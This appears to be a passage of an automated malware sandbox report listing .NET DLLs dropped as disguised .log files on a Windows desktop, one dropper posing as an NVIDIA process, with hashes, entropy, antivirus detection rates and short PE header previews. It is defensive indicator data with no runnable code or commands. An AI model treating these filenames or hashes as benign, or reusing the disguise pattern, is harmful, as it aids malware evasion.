Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\OOMCloya.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\PszJebvu.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ShoatPdx.log

Download File

Process:	C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\TAxSAtpp.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\TMLKnwYz.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\TxJtcnQc.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\UCVIiXUm.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VAeASPIF.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XOysNJXm.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\XwgSVREI.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\chLhgIIs.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\cjQhkVuX.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\fjyPCrNn.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\gzqzblNZ.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\hxRHxlcT.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\oSRflUSV.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\pAbpDGmk.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qiYwETGO.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\skLfaCLK.log

Download File

Process:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 38%
